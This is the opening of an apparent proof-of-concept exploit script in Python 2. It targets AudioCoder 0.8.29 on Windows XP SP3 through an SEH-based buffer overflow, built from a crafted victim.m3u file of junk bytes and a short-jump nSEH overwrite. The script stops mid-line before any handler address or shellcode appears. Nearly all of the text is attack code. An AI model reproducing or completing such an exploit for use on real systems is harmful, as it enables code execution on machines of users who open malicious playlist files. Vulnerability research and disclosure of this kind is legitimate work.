########################################################### #[~] Exploit Title: AudioCoder-0.8.29 Memory Corruption to Code execution[SEH] #[~] Author: sajith #[~] version: AudioCoder-0.8.29 #[~] vulnerable app link: http://www.mediacoderhq.com/getfile.htm?site=dl.mediacoderhq.com&file=AudioCoder-0.8.29.exe #[~]Tested in windows Xp sp3,english ########################################################### import struct raw_input("Letz start fuzzing") print "POC by sajith shetty" try: f = open("victim.m3u","w") header = "http://" buffer = 5000 junk = "\x41" * 757 nseh = "\xeb\x06\x90\x90" #jmp 6 bytes seh = struct.pack('